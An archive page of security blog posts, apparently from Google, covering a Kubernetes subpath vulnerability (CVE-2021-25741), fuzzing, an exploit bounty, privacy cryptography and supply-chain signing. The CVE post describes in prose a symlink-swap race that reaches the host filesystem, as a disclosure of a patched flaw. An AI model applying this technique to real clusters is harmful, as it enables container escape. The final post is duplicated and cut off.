Author Archives: Kaylin Trychon

Exploring Container Security: A Storage Vulnerability Deep Dive



Kubernetes Security is constantly evolving - keeping pace with enhanced functionality, usability and flexibility while also balancing the security needs of a wide and diverse set of use-cases.

Recently, the GKE Security team discovered a high severity vulnerability that allowed workloads to have access to parts of the host filesystem outside the mounted volumes boundaries. Although the vulnerability was patched back in September we thought it would be beneficial to write up a more in-depth analysis of the issue to share with the community.

We assessed the impact of the vulnerability as described in vulnerability management in open-source Kubernetes and worked closely with the GKE Storage team and the Kubernetes Security Response Committee to find a fix. In this post we’ll give some background on how the subpath storage system works, an overview of the vulnerability, the steps to find the root cause and the fix, and finally some recommendations for GKE and Anthos users.


Kubernetes Filesystems: Intro to Volume Subpath
The vulnerability, CVE-2021-25741, was caused by a race condition during the creation of a subpath bind mount inside a container, and allowed an attacker to gain unauthorized access to the underlying node filesystem and its sensitive files. We’ll describe how that system is supposed to work, and then talk about the vulnerability.

The volume subpath feature in Kubernetes enables sharing a volume in multiple containers inside a pod. For example, we could create a Pod with an InitContainer that creates directories with pre-populated data in a mounted filesystem volume. These directories can then be used by containers in the same Pod by mounting the same volume and optionally specifying a subpath field to limit what's visible inside the container.

While there are some great use cases for this feature, it’s an area that has had vulnerabilities discovered in the past. The kubelet must be extra cautious when handling user-owned subpaths because it operates with privileges in the host. One vulnerability that has been previously discovered involved the creation of a malicious workload where an InitContainer would create a symlink pointing to any location in the host. For example, the InitContainer could mount a volume in /mnt and create a symlink /mnt/attack inside the container pointing to /etc. Later in the Pod lifecycle, another container would attempt to mount the same volume with subpath attack. While preparing the volumes for the container, the kubelet would end up following the symlink to the host’s /etc instead of the container’s /etc, unknowingly exposing the host filesystem to the container. A previous fix made sure that the subpath mount location is resolved and validated to point to a location inside the base volume and that it's not changeable by the user in between the time the path was validated and when the container runtime bind mounts it. This race condition is known as time of check to time of use (TOCTOU) where the subject being validated changes after it has been validated.

These validations and others are summarized in the following container lifecycle sequence diagram.




Volume subpath validations before the container startup

A New TOCTOU Vulnerability: CVE-2021-25741
The latest vulnerability was discovered by performing a symlink attack similar to the one explained above, with the difference being that it constantly swapped the symlink with a directory in a tight loop, using the RENAME_EXCHANGE option with renameat(2). If the timing is just right, the kubelet will see the path as a directory and pass the validation check. Then the mount utility may find that the path is a symlink pointing to the host and follow it, exposing the host filesystem to the container. This is visualized in the following diagram:


The expectation and the attack outcome

The GKE Security and Storage teams worked closely to revise the fix done previously to find a solution. The previous fix takes several steps to ensure that the directory being mounted is safely opened and validated. After the file is opened and validated, the kubelet uses the magic-link path under /proc/[pid]/fd directory for all subsequent operations to ensure the file remains unchanged. However, we found out that all of the efforts were undone by the mount(8) linux utility which was dereferencing the procfs magic-link by default. Once the problem was understood, the fix involved making sure that the mount utility doesn't dereference the magic-links by using the --no-canonicalize flag in the mount command.

The fix is in

Once the problem was well understood, we fixed it inside Kubernetes and quickly released the fix to GKE and Anthos. If GKE auto-upgrade is enabled in your clusters there's no action on your part for this vulnerability, your nodes have already been patched. We strongly recommend that customers utilize auto-upgrades. Auto-upgrade gives peace of mind that your clusters are running with the latest patches.

GKE released a Google Kubernetes Engine security bulletin on this vulnerability, which detailed what customers can do to immediately remediate this issue across GKE and Anthos. We also provided guidance to customers who manually manage their node versions, ensuring that fixed releases were available in every region for our Static and Release Channels.

Moving forward
Google continues to invest heavily in the security of GKE and Kubernetes. We encourage users interested in finding vulnerabilities to participate in the Kubernetes bug bounty program and in the Google Vulnerability Rewards Program (VRP) which was recently expanded to cover GKE vulnerabilities. For the latest guidance on security issues, please follow our GKE Security Bulletins.

ClusterFuzzLite: Continuous fuzzing for all



In recent years, continuous fuzzing has become an essential part of the software development lifecycle. By feeding unexpected or random data into a program, fuzzing catches bugs that would otherwise slip through the most thorough manual checks and provides coverage that would take staggering human effort to replicate. NIST’s guidelines for software verification, recently released in response to the White House Executive Order on Improving the Nation’s Cybersecurity, specify fuzzing among the minimum standard requirements for code verification.

Today, we are excited to announce ClusterFuzzLite, a continuous fuzzing solution that runs as part of CI/CD workflows to find vulnerabilities faster than ever before. With just a few lines of code, GitHub users can integrate ClusterFuzzLite into their workflow and fuzz pull requests to catch bugs before they are committed, enhancing the overall security of the software supply chain.

Since its release in 2016, over 500 critical open source projects have integrated into Google’s OSS-Fuzz program, resulting in over 6,500 vulnerabilities and 21,000 functional bugs being fixed. ClusterFuzzLite goes hand-in-hand with OSS-Fuzz, by catching regression bugs much earlier in the development process.

Large projects including systemd and curl are already using ClusterFuzzLite during code review, with positive results. According to Daniel Stenberg, author of curl, “When the human reviewers nod and have approved the code and your static code analyzers and linters can't detect any more issues, fuzzing is what takes you to the next level of code maturity and robustness. OSS-Fuzz and ClusterFuzzLite help us maintain curl as a quality project, around the clock, every day and every commit.”

With the release of ClusterFuzzLite, any project can integrate this essential testing standard and benefit from fuzzing. ClusterFuzzLite offers many of the same features as ClusterFuzz, such as continuous fuzzing, sanitizer support, corpus management, and coverage report generation. Most importantly, it’s easy to set up and works with closed source projects, making ClusterFuzzLite a convenient option for any developer who wants to fuzz their software.



 


With ClusterFuzzLite, fuzzing is no longer just an idealized "bonus" round of testing for those who have access to it, but a critical must-have step that everyone can use continuously on every software project. By finding and preventing bugs before they enter the codebase we can build a more secure software ecosystem.

To learn more, check out the ClusterFuzzLite documentation. ClusterFuzzLite currently supports GitHub ActionsGoogle Cloud Build and Prow. We built this with CI system extensibility in mind, and adding support for other CI systems is straightforward. Please contact us if you’re interested in contributing support, or have any questions, feedback or feature requests.

Trick & Treat! 🎃 Paying Leets and Sweets for Linux Kernel privescs and k8s escapes


Starting today and for the next 3 months (until January 31 2022), we will pay 31,337 USD to security researchers that exploit privilege escalation in our lab environment with a patched vulnerability, and 50,337 USD to those that use a previously unpatched vulnerability, or a new exploit technique.

We are constantly investing in the security of the Linux Kernel because much of the internet, and Google—from the devices in our pockets, to the services running on Kubernetes in the cloud—depend on the security of it. We research its vulnerabilities and attacks, as well as study and develop its defenses.

But we know that there is more work to do. That’s why we have decided to build on top of our kCTF VRP from last year and triple our previous reward amounts (for at least the next 3 months).

Our base rewards for each publicly patched vulnerability is 31,337 USD (at most one exploit per vulnerability), but the reward can go up to 50,337 USD in two cases:
  • If the vulnerability was otherwise unpatched in the Kernel (0day)
  • If the exploit uses a new attack or technique, as determined by Google
We hope the new rewards will encourage the security community to explore new Kernel exploitation techniques to achieve privilege escalation and drive quicker fixes for these vulnerabilities. It is important to note, that the easiest exploitation primitives are not available in our lab environment due to the hardening done on Container-Optimized OS. Note this program complements Android's VRP rewards, so exploits that work on Android could also be eligible for up to 250,000 USD (that's in addition to this program).

The mechanics are:
  1. Connect to the kCTF VRP cluster, obtain root and read the flag (read this writeup for how it was done before, and this threat model for inspiration), and then submit your flag and a checksum of your exploit in this form.
  2. (If applicable) report vulnerabilities to upstream.
    • We strongly recommend including a patch since that could qualify for an additional reward from our Patch Reward Program, but please report vulnerabilities upstream promptly once you confirm they are exploitable.
  3. Report your finding to Google VRP once all patches are publicly available (we don't want to receive details of unpatched vulnerabilities ahead of the public.)
    • Provide the exploit code and the algorithm used to calculate the hash checksum.
    • A rough description of the exploit strategy is welcome.
Reports will be triaged on a weekly basis. If anyone has problems with the lab environment (if it's unavailable, technical issues or other questions), contact us on Discord in #kctf. You can read more details about the program here. Happy hunting!

Protecting your device information with Private Set Membership


At Google, keeping you safe online is our top priority, so we continuously build the most advanced privacy-preserving technologies into our products. Over the past few years, we've utilized innovations in cryptographic research to keep your personal information private by design and secure by default. As part of this, we launched Password Checkup, which protects account credentials by notifying you if an entered username and password are known to have been compromised in a prior data breach. Using cryptographic techniques, Password Checkup can do this without revealing your credentials to anyone, including Google. Today, Password Checkup protects users across many platforms including Android, Chrome and Google Password Manager.

Another example is Private Join and Compute, an open source protocol which enables organizations to work together and draw insights from confidential data sets. Two parties are able to encrypt their data sets, join them, and compute statistics over the joint data. By leveraging secure multi-party computation, Private Join and Compute is designed to ensure that the plaintext data sets are concealed from all parties.

In this post, we introduce the next iteration of our research, Private Set Membership, as well as its open-source availability. At a high level, Private Set Membership considers the scenario in which Google holds a database of items, and user devices need to contact Google to check whether a specific item is found in the database. As an example, users may want to check membership of a computer program on a block list consisting of known malicious software before executing the program. Often, the set’s contents and the queried items are sensitive, so we designed Private Set Membership to perform this task while preserving the privacy of our users.

Protecting your device information during enrollment
Beginning in Chrome 94, Private Set Membership will enable Chrome OS devices to complete the enrollment process in a privacy-preserving manner. Device enrollment is an integral part of the out-of-box experience that welcomes you when getting started with a Chrome OS device.

The device enrollment process requires checking membership of device information in encrypted Google databases, including checking if a device is enterprise enrolled or determining if a device was pre-packaged with a license. The correct end state of your Chrome OS device is determined using the results of these membership checks.

During the enrollment process, we protect your Chrome OS devices by ensuring no information ever leaves the device that may be decrypted by anyone else when using Private Set Membership. Google will never learn any device information and devices will not learn any unnecessary information about other devices. ​​To our knowledge, this is the first instance of advanced cryptographic tools being leveraged to protect device information during the enrollment process.

A deeper look at Private Set Membership
Private Set Membership is built upon two cryptographic tools:
  • Homomorphic encryption is a powerful cryptographic tool that enables computation over encrypted data without the need for decryption. As an example, given the encryptions of values X and Y, homomorphic encryption enables computing the encryption of the sum of X and Y without ever needing to decrypt. This preserves privacy as the data remains concealed during the computation. Private Set Membership is built upon Google’s open source homomorphic encryption library.
  • Oblivious hashing is a cryptographic technique that enables two parties to jointly compute a hash, H(K, x), where the sender holds the key, K, and the receiver holds the hash input, x. The receiver will obtain the hash, H(K, x), without learning the key K. At the same time, the input x will be hidden from the sender.
Take a look at how Private Set Membership utilizes homomorphic encryption and oblivious hashing to protect data below:



For a deeper look into the technology behind Private Set Membership, you can also access our open source code.

Privacy properties
By using Private Set Membership, the following privacy properties are obtained:
  • No data leaves the device when checking membership. We designed Private Set Membership using advanced cryptographic techniques to ensure that data never leaves the device in an unencrypted manner when performing membership checks. As a result, the data on your device will be concealed from everyone, including Google.
  • Devices learn only membership information and nothing else. Private Set Membership was designed to prevent devices from learning any unnecessary information about other devices when querying. For each query, devices learn only the results of the membership check and no other information.
Using Private Set Membership to solve more problems
Private Set Membership is a powerful tool that solves a fundamental problem in a privacy-preserving manner. This is just the beginning of what’s possible using this technology. Private Set Membership can help preserve user privacy across a wide array of applications. For example:
  • Checking allow or block lists. In this setting, users check membership in an allow or block list to determine whether to proceed with the desired action. Private Set Membership enables this check without any information about the software leaving the device.
  • Control flows with conditional membership checks. Control flows are a common computer science concept that represent arbitrary computer programs with conditional branching. In many cases, the conditional branches require checking membership of sensitive data to determine the next step of the algorithm. By utilizing Private Set Membership, we enable execution of these algorithms while ensuring data never leaves the user’s device.
We still have a ways to go before Private Set Membership is used for general membership checks by devices. At Google, we are exploring a number of potential use cases to protect your privacy using Private Set Membership. We are excited to continue advancing the state-of-the-art cryptographic research to keep you safe.

Acknowledgements


The work in this post is the result of a collaboration between a large group of current and former Google engineers, research scientists and others including: Amr Aboelkher, Asra Ali, Ghous Amjad, Yves Arrouye, Roland Bock, Xi Chen, Maksim Ivanov, Dennis Kalinichenko, Nirdhar Khazanie, Dawon Lee, Tancrède Lepoint, Lawrence Lui, Pavol Marko, Thiemo Nagel, Mariana Raykova, Aaron Segal, Joon Young Seo, Karn Seth, and Jason Wong.

Launching a collaborative minimum security baseline


According to an Opus and Ponemon Institute study, 59% of companies have experienced a data breach caused by one of their vendors or third parties. Outsourcing operations to third-party vendors has become a popular business strategy as it allows organizations to save money and increase operational efficiency. While these are positives for business operations, they do create significant security risks. These vendors have access to critical systems and customer data and so their security posture becomes equally as important.

Up until today, organizations of all sizes have had to design and implement their own security baselines for vendors that align with their risk posture. Unfortunately, this creates an impossible situation for vendors and organizations alike as they try to accommodate thousands of different requirements.

To solve this challenge, organizations across the industry teamed up to design Minimum Viable Secure Product or MVSP – a vendor-neutral security baseline that is designed to eliminate overhead, complexity and confusion during the procurement, RFP and vendor security assessment process by establishing minimum acceptable security baselines. With MVSP, the industry can increase clarity during each phase so parties on both sides of the equation can achieve their goals, and reduce the onboarding and sales cycle by weeks or even months.

MVSP was developed and is backed by companies across the industry, including Google, Salesforce, Okta, Slack and more. Our goal is to increase the minimum bar for security across the industry while simplifying the vetting process.

MVSP is a collaborative baseline focused on developing a set of minimum security requirements for business-to-business software and business process outsourcing suppliers. Designed with simplicity in mind, it contains only those controls that must, at a minimum, be implemented to ensure a reasonable security posture. MVSP is presented in the form of a minimum baseline checklist that can be used to verify the security posture of a solution.

How can MVSP help you?





Security teams measuring vendor offerings against a set of minimum security baselines

MVSP ensures that vendor selection and RFP include a minimum baseline that is backed by the industry. Communicating minimum requirements up front ensures everyone understands where they stand and that the expectations are clear.

Internal teams looking to measure your security against minimum requirements

MVSP provides a set of minimum security baselines that can be used as a checklist to understand gaps in the security of a product or service. This can be used to highlight opportunities for improvement and raise their visibility within the organization, with clearly defined benefits.


Procurement teams gathering information about vendor services

MVSP provides a single set of security-relevant questions that are publicly available and industry-backed. Aligning on a single set of baselines allows clearer understanding from vendors, resulting in a quicker and more accurate response.

Legal teams negotiating contractual controls

MVSP ensures expectations regarding minimum security controls are understood up front, reducing discussions of controls at the contract negotiation stage. Referencing an external baseline helps to simplify contract language and increases familiarity with the requirements.

Compliance teams documenting processes

MVSP provides an externally recognized and adopted set of security baselines on top of which to build your compliance efforts.

We welcome community feedback and interest from other organizations who want to contribute to the MVSP baseline. Together we can raise the minimum bar for security across the industry and make everyone safer.

Acknowledgements

The work in this post is the result of a collaboration between a large number of security practitioners across the industry including: Marat Vyshegorodtsev, Chris John Riley, Gabor Acs-Kurucz, Sebastian Oglaza, Gen Buckley, and Kevin Clark.

Google Protects Your Accounts – Even When You No Longer Use Them





What happens to our digital accounts when we stop using them? It’s a question we should all ask ourselves, because when we are no longer keeping tabs on what’s happening with old accounts, they can become targets for cybercrime.

In fact, quite a few recent high-profile breaches targeted inactive accounts. The Colonial Pipeline ransomware attack came through an inactive account that didn’t use multifactor authentication, according to a consultant who investigated the incident. And in the case of the recent T-Mobile breach this summer, information from inactive prepaid accounts was accessed through old billing files. Inactive accounts can pose a serious security risk.

For Google users, Inactive Account Manager helps with that problem. You can decide when Google should consider your account inactive and whether Google should delete your data or share it with a trusted contact.

Here’s How it Works

Once you sign up for Inactive Account Manager, available in My Account settings, you are asked to decide three things:
  1. When the account should be considered inactive: You can choose 3, 6, 12 or 18 months of inactivity before Google takes action on your account. Google will notify you a month before the designated time via a message sent to your phone and an email sent to the address you provide.
  2. Who to notify and what to share: You can choose up to 10 people for Google to notify once your Google Account becomes inactive (they won’t be notified during setup). You can also give them access to some of your data. If you choose to share data with your trusted contacts, the email will include a list of the selected data you wanted to share with them, and a link they can follow to download that data. This can include things like photos, contacts, emails, documents and other data that you specifically choose to share with your trusted contact. You can also choose to set up a Gmail AutoReply, with a custom subject and message explaining that you’ve ceased using the account.
  3. If your inactive Google Account should be deleted: After your account becomes inactive, Google can delete all its content or send it to your designated contacts. If you’ve decided to allow someone to download your content, they’ll be able to do so for 3 months before it gets deleted. If you choose to delete your Google Account, this will include your publicly shared data (for example, your YouTube videos, or blogs on Blogger). You can review the data associated with your account on the Google Dashboard. If you use Gmail with your account, you'll no longer be able to access that email once your account becomes inactive. You'll also be unable to reuse that Gmail username.
Setting up an Inactive Account plan is a simple step you can take to protect your data, secure your account in case it becomes inactive, and ensure that your digital legacy is shared with your trusted contacts in case you become unable to access your account. Our Privacy Checkup now reminds you to set up a plan for your account, and we’ll send you an occasional reminder about your plan via email.

At Google, we are constantly working to keep you safer online. This October, as we celebrate Cybersecurity Awareness Month, we want to remind our users of the security and privacy controls they have at their fingertips. For more ways to enhance your security check out our top five safety tips and visit our Safety Center to learn all the ways Google helps keep you safer online, every day.

Introducing the Secure Open Source Pilot Program


Over the past year we have made a number of investments to strengthen the security of critical open source projects, and recently announced our $10 billion commitment to cybersecurity defense including $100 million to support third-party foundations that manage open source security priorities and help fix vulnerabilities.

Today, we are excited to announce our sponsorship for the Secure Open Source (SOS) pilot program run by the Linux Foundation. This program financially rewards developers for enhancing the security of critical open source projects that we all depend on. We are starting with a $1 million investment and plan to expand the scope of the program based on community feedback.


Why SOS?

SOS rewards a very broad range of improvements that proactively harden critical open source projects and supporting infrastructure against application and supply chain attacks. To complement existing programs that reward vulnerability management, SOS’s scope is comparatively wider in the type of work it rewards, in order to support project developers.


What projects are in scope?

Since there is no one definition of what makes an open source project critical, our selection process will be holistic. During submission evaluation we will consider the guidelines established by the National Institute of Standards and Technology’s definition in response to the recent Executive Order on Cybersecurity along with criteria listed below:
  • The impact of the project:
    • How many and what types of users will be affected by the security improvements?
    • Will the improvements have a significant impact on infrastructure and user security?
    • If the project were compromised, how serious or wide-reaching would the implications be?
  • The project’s rankings in existing open source criticality research:

What security improvements qualify? 

The program is initially focused on rewarding the following work:

  • Software supply chain security improvements including hardening CI/CD pipelines and distribution infrastructure. The SLSA framework suggests specific requirements to consider, such as basic provenance generation and verification.
  • Adoption of software artifact signing and verification. One option to consider is Sigstore's set of utilities (e.g. cosign).
  • Project improvements that produce higher OpenSSF Scorecard results. For example, a contributor can follow remediation suggestions for the following Scorecard checks:
    • Code-Review
    • Branch-Protection
    • Pinned-Dependencies
    • Dependency-Update-Tool
    • Fuzzing
  • Use of OpenSSF Allstar and remediation of discovered issues.
  • Earning a CII Best Practice Badge (which also improves the Scorecard results).
We'll continue adding to the above list, so check our FAQ for updates. You may also submit improvements not listed above, if you provide justification and evidence to help us understand the complexity and impact of the work.

Only work completed after October 1, 2021 qualifies for SOS rewards.

Upfront funding is available on a limited case by case basis for impactful improvements of moderate to high complexity over a longer time span. Such requests should explain why funding is required upfront and provide a detailed plan of how the improvements will be landed.

How to participate

Review our FAQ and fill out this form to submit your application.

Please include as much data or supporting evidence as possible to help us evaluate the significance of the project and your improvements. 


Reward amounts

Reward amounts are determined based on complexity and impact of work:
  • $10,000 or more for complicated, high-impact and lasting improvements that almost certainly prevent major vulnerabilities in the affected code or supporting infrastructure.
  • $5,000-$10,000 for moderately complex improvements that offer compelling security benefits.
  • $1,000-$5,000 for submissions of modest complexity and impact.
  • $505 for small improvements that nevertheless have merit from a security standpoint.

Looking Ahead

The SOS program is part of a broader effort to address a growing truth: the world relies on open source software, but widespread support and financial contributions are necessary to keep that software safe and secure. This $1 million investment is just the beginning—we envision the SOS pilot program as the starting point for future efforts that will hopefully bring together other large organizations and turn it into a sustainable, long-term initiative under the OpenSSF. We welcome community feedback and interest from others who want to contribute to the SOS program. Together we can pool our support to give back to the open source community that makes the modern internet possible.

Announcing New Patch Reward Program for Tsunami Security Scanner


One year ago, we published the Tsunami security scanner with the goal of detecting high severity, actively exploited vulnerabilities with high confidence. In the last several months, the Tsunami scanner team has been working closely with our vulnerability rewards program, Bug Hunters, to further improve Tsunami's security detection capabilities.

Today, we are announcing a new experimental Patch Reward Program for the Tsunami project. Participants in the program will receive patch rewards for providing novel Tsunami detection plugins and web application fingerprints. We hope this program will allow us to quickly extend the detection capabilities of the scanner to better benefit our users and uncover more vulnerabilities in their network infrastructure.

For this launch, we will accept two types of contributions:
  • Vulnerability detection plugins: In order to expand Tsunami scanner's detection capabilities, we encourage everyone who is interested in making contributions to this project to add new vulnerabilities detection plugins. All plugin contributions will be reviewed by our panel members in Google's Vulnerability Management team and the reward amount will be determined by the severity as well as the time sensitivity of the vulnerability.
  • Web application fingerprints: Several months ago, we added new web application fingerprinting capabilities to Tsunami that detect popular off-the-shelf web applications. It achieves this goal by matching application fingerprints against a database of known web application fingerprints. More fingerprint data is needed for this approach to support more web applications. You will be rewarded with a flat amount for each application added to the database.

As with other Security Reward Programs, rewards can be donated to charity—and we'll double your donation if you choose to do so. We'll run this program in iterations so that everyone interested has the opportunity to participate.

To learn more about this program, please check out our official rules and guidelines. And if you have any questions or suggestions for the program, feel free to contact us at [email protected].

Distroless Builds Are Now SLSA 2

A few months ago we announced that we started signing all distroless images with cosign, which allows users to verify that they have the correct image before starting the build process. Signing our images was our first step towards fully securing the distroless supply chain. Since then, we’ve implemented even more accountability in our supply chain and are excited to announce that distroless builds have achieved SLSA 2. SLSA is a security framework for increasing supply chain security, and Level 2 ensures that the build service is tamper resistant.


This means that in addition to a signature, each distroless image now has an associated signed provenance. This provenance is an in-toto attestation and includes information around how each image was built, what command was run, and what build system was used. It also includes any special parameters that were passed in, the exact commit the images were built at, and more. This provenance is a useful tool for builds that need to be audited in the future.

SLSA 2 Requirement

Distroless

Source - Version controlled

Source code in Github

Build - Scripted build

Build script exists as a Tekton Pipeline, invoked as a Google Cloud Build step

Build - Build service

All steps run on Kubernetes with Tekton

Provenance - Available

Provenance is available in the rekor transparency log as an in-toto attestation

Provenance - Authenticated

Provenance is signed with the distroless GCP KMS key

Provenance - Service generated

Provenance is generated by Tekton Chains from a Tekton TaskRun



Achieving SLSA 2 required some changes to the distroless build pipeline: we set up Tekton Pipelines and Tekton Chains in a GKE cluster to automate building images and generating provenance. Every time a pull request is merged to the distroless Github repo, a Tekton Pipeline is triggered. This Pipeline builds the distroless images, and Tekton Chains is responsible for generating signed provenance for each image. Tekton Chains stores the signed provenance alongside the image in an OCI registry and also stores a record of the provenance in the rekor transparency log.

Don't trust us?


You can try the build yourself. Because distroless builds are reproducible, all the information to replicate the build is in the provenance, and you or a trusted third party can build the image yourselves and verify the build is correct by matching image digests.


You can verify an attestation for a distroless image with cosign and the distroless public key:

$ cosign verify-attestation -key cosign.pub gcr.io/distroless/[email protected]:4f8aa0aba190e375a5a53bb71a303c89d9734c817714aeaca9bb23b82135ed91


Verification for gcr.io/distroless/[email protected]:4f8aa0aba190e375a5a53bb71a303c89d9734c817714aeaca9bb23b82135ed91 --

The following checks were performed on each of these signatures:

  - The cosign claims were validated

  - The signatures were verified against the specified public key

  - Any certificates were verified against the Fulcio roots.


...


And you can find the provenance for the image in the rekor transparency log with the rekor-cli tool. For example, you could find the provenance for the above image by using the image’s digest and running:

$ rekor-cli search --sha sha256:4f8aa0aba190e375a5a53bb71a303c89d9734c817714aeaca9bb23b82135ed91


af7a9687d263504ccdb2759169c9903d8760775045c6e7554e365ec2bf29f6f8


$ rekor-cli get --uuid af7a9687d263504ccdb2759169c9903d8760775045c6e7554e365ec2bf29f6f8 --format json | jq -r .Attestation | base64 --decode | jq


{

  "_type": "distroless-provenance",

  "predicateType": "https://tekton.dev/chains/provenance",

  "subject": [

    {

      "name": "gcr.io/distroless/base",

      "digest": {

        "sha256": "703a4726aedc9ec7a7e32251087565246db117bb9a141a7993d1c4bb4036660d"

      }

    },

    {

      "name": "gcr.io/distroless/base",

      "digest": {

        "sha256": "d322ed16d530596c37eee3eb57a039677502aa71f0e4739b0272b1ebd8be9bce"

      }

    },

    {

      "name": "gcr.io/distroless/base",

      "digest": {

        "sha256": "2dfdd5bf591d0da3f67a25f3fc96d929b256d5be3e0af084db10952e5da2c661"

      }

    },

    {

      "name": "gcr.io/distroless/base",

      "digest": {

        "sha256": "4f8aa0aba190e375a5a53bb71a303c89d9734c817714aeaca9bb23b82135ed91"

      }

    },

    {

      "name": "gcr.io/distroless/base",

      "digest": {

        "sha256": "dc0a793d83196a239abf3ba035b3d1a0c7a24184856c2649666e84bc82fc5980"

      }

    },

    {

      "name": "gcr.io/distroless/base-debian10",

      "digest": {

        "sha256": "2dfdd5bf591d0da3f67a25f3fc96d929b256d5be3e0af084db10952e5da2c661"

      }

    },

    {

      "name": "gcr.io/distroless/base-debian10",

      "digest": {

        "sha256": "703a4726aedc9ec7a7e32251087565246db117bb9a141a7993d1c4bb4036660d"

      }

    },

    {

      "name": "gcr.io/distroless/base-debian10",

      "digest": {

        "sha256": "4f8aa0aba190e375a5a53bb71a303c89d9734c817714aeaca9bb23b82135ed91"

      }

    },

    {

      "name": "gcr.io/distroless/base-debian10",

      "digest": {

        "sha256": "d322ed16d530596c37eee3eb57a039677502aa71f0e4739b0272b1ebd8be9bce"

      }

    },

    {

      "name": "gcr.io/distroless/base-debian10",

      "digest": {

        "sha256": "dc0a793d83196a239abf3ba035b3d1a0c7a24184856c2649666e84bc82fc5980"

      }

    },

    {

      "name": "gcr.io/distroless/base-debian11",

      "digest": {

        "sha256": "c9507268813f235b11e63a7ae01526b180c94858bd718d6b4746c9c0e8425f7a"

      }

    },

    {

      "name": "gcr.io/distroless/cc",

      "digest": {

        "sha256": "4af613acf571a1b86b1d3c50682caada0b82024e566c1c4c2fe485a70f3af47d"

      }

    },

    {

      "name": "gcr.io/distroless/cc",

      "digest": {

        "sha256": "2c4bb6b7236db0a55ec54ba8845e4031f5db2be957ac61867872bf42e56c4deb"

      }

    },

    {

      "name": "gcr.io/distroless/cc",

      "digest": {

        "sha256": "2c4bb6b7236db0a55ec54ba8845e4031f5db2be957ac61867872bf42e56c4deb"

      }

    },

    {

      "name": "gcr.io/distroless/cc-debian10",

      "digest": {

        "sha256": "4af613acf571a1b86b1d3c50682caada0b82024e566c1c4c2fe485a70f3af47d"

      }

    },

    {

      "name": "gcr.io/distroless/cc-debian10",

      "digest": {

        "sha256": "2c4bb6b7236db0a55ec54ba8845e4031f5db2be957ac61867872bf42e56c4deb"

      }

    },

    {

      "name": "gcr.io/distroless/cc-debian10",

      "digest": {

        "sha256": "2c4bb6b7236db0a55ec54ba8845e4031f5db2be957ac61867872bf42e56c4deb"

      }

    },

    {

      "name": "gcr.io/distroless/java",

      "digest": {

        "sha256": "deb41661be772c6256194eb1df6b526cc95a6f60e5f5b740dda2769b20778c51"

      }

    },

    {

      "name": "gcr.io/distroless/nodejs",

      "digest": {

        "sha256": "927dd07e7373e1883469c95f4ecb31fe63c3acd104aac1655e15cfa9ae0899bf"

      }

    },

    {

      "name": "gcr.io/distroless/nodejs",

      "digest": {

        "sha256": "927dd07e7373e1883469c95f4ecb31fe63c3acd104aac1655e15cfa9ae0899bf"

      }

    },

    {

      "name": "gcr.io/distroless/nodejs",

      "digest": {

        "sha256": "f106757268ab4e650b032e78df0372a35914ed346c219359b58b3d863ad9fb58"

      }

    },

    {

      "name": "gcr.io/distroless/nodejs-debian10",

      "digest": {

        "sha256": "927dd07e7373e1883469c95f4ecb31fe63c3acd104aac1655e15cfa9ae0899bf"

      }

    },

    {

      "name": "gcr.io/distroless/nodejs-debian10",

      "digest": {

        "sha256": "f106757268ab4e650b032e78df0372a35914ed346c219359b58b3d863ad9fb58"

      }

    },

    {

      "name": "gcr.io/distroless/nodejs-debian10",

      "digest": {

        "sha256": "927dd07e7373e1883469c95f4ecb31fe63c3acd104aac1655e15cfa9ae0899bf"

      }

    },

    {

      "name": "gcr.io/distroless/python3",

      "digest": {

        "sha256": "aa8a0358b2813e8b48a54c7504316c7dcea59d6ae50daa0228847de852c83878"

      }

    },

    {

      "name": "gcr.io/distroless/python3-debian10",

      "digest": {

        "sha256": "aa8a0358b2813e8b48a54c7504316c7dcea59d6ae50daa0228847de852c83878"

      }

    },

    {

      "name": "gcr.io/distroless/static",

      "digest": {

        "sha256": "9acfd1fdf62b26cbd4f3c31422cf1edf3b7b01a9ecee00a499ef8b7e3536914d"

      }

    },

    {

      "name": "gcr.io/distroless/static",

      "digest": {

        "sha256": "e50641dbb871f78831f9aa7ffa59ec8f44d4cc33ae4ee992c9f4b046040e97f2"

      }

    },

    {

      "name": "gcr.io/distroless/static-debian10",

      "digest": {

        "sha256": "9acfd1fdf62b26cbd4f3c31422cf1edf3b7b01a9ecee00a499ef8b7e3536914d"

      }

    },

    {

      "name": "gcr.io/distroless/static-debian10",

      "digest": {

        "sha256": "e50641dbb871f78831f9aa7ffa59ec8f44d4cc33ae4ee992c9f4b046040e97f2"

      }

    }

  ],

  "predicate": {

    "invocation": {

      "parameters": [

        "MANIFEST_SUBSECTION={string 0 []}",

        "CHAINS-GIT_COMMIT={string 976c1c9bc178ac0371d8888d69893145c3df09f0 []}",

        "CHAINS-GIT_URL={string https://github.com/GoogleContainerTools/distroless []}"

      ],

      "recipe_uri": "task://distroless-provenance",

      "event_id": "531c282f-806e-41e4-b3ad-b596c4283381",

      "builder.id": "tekton-chains"

    },

    "recipe": {

      "steps": [

        {

          "entryPoint": "#!/bin/sh\nset -ex\n\n# get the digests for a subset of images built, and store in the IMAGES result\ngo run provenance/provenance.go images $(params.MANIFEST_SUBSECTION) > $(results.IMAGES.path)\n",

          "arguments": null,

          "environment": {

            "container": "provenance",

            "image": "docker.io/library/[email protected]:cb1a7482cb5cfc52527c5cdea5159419292360087d5249e3fe5472f3477be642"

          },

          "annotations": null

        }

      ]

    },

    "metadata": {

      "buildStartedOn": "2021-09-16T00:03:04Z",

      "buildFinishedOn": "2021-09-16T00:04:36Z"

    },

    "materials": [

      {

        "uri": "https://github.com/GoogleContainerTools/distroless",

        "digest": {

          "revision": "976c1c9bc178ac0371d8888d69893145c3df09f0"

        }

      }

    ]

  }

}



As you might guess, our next step is getting distroless to SLSA 3, which will require adding non-falsifiable provenance and isolated builds to the distroless supply chain. Stay tuned for more!

Distroless Builds Are Now SLSA 2

A few months ago we announced that we started signing all distroless images with cosign, which allows users to verify that they have the correct image before starting the build process. Signing our images was our first step towards fully securing the distroless supply chain. Since then, we’ve implemented even more accountability in our supply chain and are excited to announce that distroless builds have achieved SLSA 2. SLSA is a security framework for increasing supply chain security, and Level 2 ensures that the build service is tamper resistant.


This means that in addition to a signature, each distroless image now has an associated signed provenance. This provenance is an in-toto attestation and includes information around how each image was built, what command was run, and what build system was used. It also includes any special parameters that were passed in, the exact commit the images were built at, and more. This provenance is a useful tool for builds that need to be audited in the future.

SLSA 2 Requirement

Distroless

Source - Version controlled

Source code in Github

Build - Scripted build

Build script exists as a Tekton Pipeline, invoked as a Google Cloud Build step

Build - Build service

All steps run on Kubernetes with Tekton

Provenance - Available

Provenance is available in the rekor transparency log as an in-toto attestation

Provenance - Authenticated

